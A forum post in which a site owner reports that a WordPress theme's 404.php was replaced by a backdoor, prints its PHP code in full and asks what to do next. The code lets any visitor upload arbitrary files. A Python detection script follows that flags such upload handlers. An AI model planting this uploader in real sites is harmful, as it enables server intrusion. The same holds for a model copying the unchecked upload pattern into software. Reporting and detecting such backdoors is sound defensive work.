• Dear All,

    I am writing this post to notify users of a possible serious hack.

    The 404.php file was hacked and it has been converted to:

    <?php
    if(isset($_POST['Submit'])){
       $filedir = "";
       $maxfile = '2000000';
    
       $userfile_name = $_FILES['image']['name'];
       $userfile_tmp = $_FILES['image']['tmp_name'];
       if (isset($_FILES['image']['name'])) {
          $abod = $filedir.$userfile_name;
          @move_uploaded_file($userfile_tmp, $abod);
    
    echo"<center><b>Done ==> $userfile_name</b></center>";
    }
    }
    else{
    echo'
    <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input //type="Submit" name="Submit" value="Submit"></form>';
    }
    ?>

    That basically does this: if content is not found, it redirects you to a page where you can upload files. The important point is that you do not need to be a user or anything; anyone can upload any file to the server.

    I basically deleted 404.php and apparently this problem is solved. Yet, I would like to know what further steps I can take. Any help would be much appreciated.

    PS: I am using Lucid Theme of Theme Forest and the site is hosted by GoDaddy.
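
As a follow-up check after deleting the file, the sketch below (an added example, not part of the original post or of any WordPress tooling) walks a directory tree and flags PHP files that store uploads the way the quoted 404.php does. The indicator names, the regular expressions and the `inspect_php` / `scan_tree` helpers are assumptions made for this example; the clean sample is constructed.

```python
import re
import sys
from pathlib import Path

# Traits of the uploader quoted in the post (heuristics chosen for this example).
INDICATORS = {
    "upload_sink": re.compile(r"move_uploaded_file\s*\("),
    "suppressed_errors": re.compile(r"@\s*move_uploaded_file\s*\("),
    "client_filename": re.compile(r"\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]"),
    "multipart_form": re.compile(r"enctype\s*=\s*['\"]multipart/form-data", re.I),
}
# WordPress login, capability and nonce checks. An upload sink in a file with
# none of them is reachable by any visitor, as in the post.
ACCESS_CHECK = re.compile(
    r"\b(is_user_logged_in|current_user_can|check_admin_referer|wp_verify_nonce)\s*\(")

def inspect_php(source):
    """Return indicator names for one PHP source; [] if it never stores an upload."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    if "upload_sink" not in hits:
        return []
    if not ACCESS_CHECK.search(source):
        hits.append("no_access_check")
    return hits

def scan_tree(root):
    """Map each *.php file under root that stores uploads to its indicators."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = inspect_php(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings

# Abridged from the 404.php quoted in the post.
SAMPLE_HACKED = r"""<?php
if(isset($_POST['Submit'])){
   $userfile_name = $_FILES['image']['name'];
   $userfile_tmp = $_FILES['image']['tmp_name'];
   @move_uploaded_file($userfile_tmp, $filedir.$userfile_name);
}
else{ echo '<form method="POST" action="" enctype="multipart/form-data"></form>'; }
"""
# Constructed sample of an ordinary theme 404 template.
SAMPLE_CLEAN = "<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n"

if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{path}: {', '.join(hits)}")
```

Run it with the site's `wp-content` directory as the argument. A hit is a candidate for manual review, since legitimate plugins also handle uploads; files reported with `no_access_check` deserve the first look.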

Viewing 1 replies (of 1 total)

The topic ‘404.php hack allows file upload’ is closed to new replies.